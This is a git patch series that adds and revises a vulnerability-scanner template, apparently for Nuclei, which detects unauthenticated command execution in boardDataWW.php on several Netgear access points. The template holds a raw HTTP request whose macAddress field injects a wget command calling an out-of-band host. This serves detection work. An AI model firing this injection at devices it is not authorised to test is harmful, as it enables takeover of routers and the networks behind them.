From 9ac9c195d7202f840cc8ad216c0be88301fb17dd Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 18:27:16 +0530 Subject: [PATCH 1/3] Create netgear-boarddataww-rce.yaml --- http/iot/netgear-boarddataww-rce.yaml | 39 +++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/iot/netgear-boarddataww-rce.yaml diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml new file mode 100644 index 0000000000..c83be5cafd --- /dev/null +++ b/http/iot/netgear-boarddataww-rce.yaml @@ -0,0 +1,39 @@ +id: netgear-boarddataww-rce + +info: + name: Netgear router boardDataWW.php - Remote Code Execution + author: pussycat0x + severity: high + description: | + There is an RCE vulnerability in boardDataWW.php of this product. Malicious attackers may use this vulnerability to execute malicious commands, eventually causing the server to crash. + reference: + - https://github.com/wy876/POC/blob/main/Netgear%E8%B7%AF%E7%94%B1%E5%99%A8boardDataWW.php%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md + metadata: + fofa-query: title=="Netgear" + tags: rce,netgear,iot + +http: + - raw: + - | + POST /boardDataWW.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: body + words: + - "Netgear" + + - type: status + status: + - 200 From 0551ac2a392f3c4ff5a72763f4c453937d87bdb3 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 27 May 2024 20:55:22 +0530 Subject: [PATCH 2/3] lint - fix --- http/iot/netgear-boarddataww-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml index c83be5cafd..56d5921e84 100644 --- a/http/iot/netgear-boarddataww-rce.yaml +++ b/http/iot/netgear-boarddataww-rce.yaml @@ -19,7 +19,7 @@ http: Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded - + macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit matchers-condition: and From 051002ec78e6aca5dad8df6734dbf74ea895785c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 13:43:14 +0530 Subject: [PATCH 3/3] minor update --- http/iot/netgear-boarddataww-rce.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml index 56d5921e84..7609c7043a 100644 --- a/http/iot/netgear-boarddataww-rce.yaml +++ b/http/iot/netgear-boarddataww-rce.yaml @@ -1,15 +1,18 @@ id: netgear-boarddataww-rce info: - name: Netgear router boardDataWW.php - Remote Code Execution + name: Netgear Devices boardDataWW.php Unauthenticated Remote Command Execution author: pussycat0x - severity: high + severity: critical description: | - There is an RCE vulnerability in boardDataWW.php of this product. Malicious attackers may use this vulnerability to execute malicious commands, eventually causing the server to crash. + boardDataWW.php in Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute arbitrary commands. reference: - https://github.com/wy876/POC/blob/main/Netgear%E8%B7%AF%E7%94%B1%E5%99%A8boardDataWW.php%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md + - https://github.com/gobysec/GobyVuls/blob/master/Netgear_Devices_boardDataWW.php_Unauthenticated_Remote_Command_Execution.md metadata: fofa-query: title=="Netgear" + verified: true + max-request: 1 tags: rce,netgear,iot http: